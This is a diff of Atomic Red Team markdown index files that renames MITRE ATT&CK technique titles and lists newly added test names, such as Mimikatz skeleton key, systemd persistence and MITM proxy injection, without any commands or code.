 - T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -522,7 +522,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -785,7 +785,8 @@
 - T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
   - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1375,7 +1376,15 @@
   - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
 - [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
   - Atomic Test #1: AutoHotKey script execution [windows]
-- T1569.003 Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1569.003 System Services: Systemctl](../../T1569.003/T1569.003.md)
+  - Atomic Test #1: Create and Enable a Malicious systemd Service Unit [linux]
+  - Atomic Test #2: Create systemd Service Unit from /tmp (Unusual Location) [linux]
+  - Atomic Test #3: Create systemd Service Unit from /dev/shm (Unusual Location) [linux]
+  - Atomic Test #4: Modify Existing systemd Service to Execute Malicious Command [linux]
+  - Atomic Test #5: Execute Command via Transient systemd Service (systemd-run) [linux]
+  - Atomic Test #6: Enumerate All systemd Services Using systemctl [linux]
+  - Atomic Test #7: Enable systemd Service for Persistence with Auto-Restart [linux]
+  - Atomic Test #8: Masquerade Malicious Service as Legitimate System Service [linux]
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy Docker container [containers]
@@ -1584,7 +1593,12 @@
   - Atomic Test #2: Firefox [linux, windows, macos]
   - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
   - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
+  - Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
+  - Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
+  - Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
   - Atomic Test #1: Application Shim Installation [windows]
@@ -1903,7 +1917,8 @@
   - Atomic Test #2: Event Monitor Daemon Persistence [macos]
   - Atomic Test #3: Launch Agent - Root Directory [macos]
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
@@ -1971,7 +1986,8 @@
   - Atomic Test #1: Base64 Encoded data. [macos, linux]
   - Atomic Test #2: Base64 Encoded data (freebsd) [linux]
   - Atomic Test #3: XOR Encoded data. [windows]
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
+  - Atomic Test #1: DGA Simulation (Python) [linux]
 - [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
   - Atomic Test #1: DNS Large Query Volume [windows]
   - Atomic Test #2: DNS Regular Beaconing [windows]
@@ -1998,7 +2014,9 @@
   - Atomic Test #13: Splashtop Execution [windows]
   - Atomic Test #14: Splashtop Streamer Execution [windows]
   - Atomic Test #15: Microsoft App Quick Assist Execution [windows]
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
+  - Atomic Test #2: MITM Proxy Injection (Windows) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
   - Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
@@ -2509,7 +2527,8 @@
 - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
   - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
   - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -3133,7 +3152,9 @@
 - [T1195 Supply Chain Compromise](../../T1195/T1195.md)
   - Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
+  - Atomic Test #2: MITM Proxy Injection (Windows) [windows]
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
   - Atomic Test #2: Activate Guest Account [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -224,7 +224,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -415,7 +415,7 @@
 - [T1176 Browser Extensions](../../T1176/T1176.md)
   - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Firefox [linux, windows, macos]
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -474,7 +474,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -502,14 +502,16 @@
 - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
   - Atomic Test #1: Base64 Encoded data. [macos, linux]
   - Atomic Test #2: Base64 Encoded data (freebsd) [linux]
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
+  - Atomic Test #1: DGA Simulation (Python) [linux]
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
   - Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -720,7 +722,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -905,7 +907,8 @@
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -180,7 +180,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -366,7 +366,7 @@
   - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Firefox [linux, windows, macos]
   - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,7 +421,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -446,14 +446,15 @@
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
   - Atomic Test #1: Base64 Encoded data. [macos, linux]
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
   - Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -643,7 +644,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -794,7 +795,8 @@
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #1: MITM Proxy Injection [macos, linux]
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #3: Enable Guest Account on macOS [macos]
 - T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/office-365-index.md

@@ -83,7 +83,7 @@
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -563,7 +563,8 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
   - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1112,7 +1113,12 @@
   - Atomic Test #2: Firefox [linux, windows, macos]
   - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
   - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
+  - Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
+  - Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
+  - Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
+  - Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
   - Atomic Test #1: Application Shim Installation [windows]
@@ -1354,7 +1360,8 @@
 - [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1387,7 +1394,7 @@
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
   - Atomic Test #3: XOR Encoded data. [windows]
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
   - Atomic Test #1: DNS Large Query Volume [windows]
   - Atomic Test #2: DNS Regular Beaconing [windows]
@@ -1414,7 +1421,8 @@
   - Atomic Test #13: Splashtop Execution [windows]
   - Atomic Test #14: Splashtop Streamer Execution [windows]
   - Atomic Test #15: Microsoft App Quick Assist Execution [windows]
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #2: MITM Proxy Injection (Windows) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
   - Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
@@ -1766,7 +1774,8 @@
 - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
   - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
   - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -2141,7 +2150,8 @@
 - [T1195 Supply Chain Compromise](../../T1195/T1195.md)
   - Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1659 Content Injection](../../T1659/T1659.md)
+  - Atomic Test #2: MITM Proxy Injection (Windows) [windows]
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
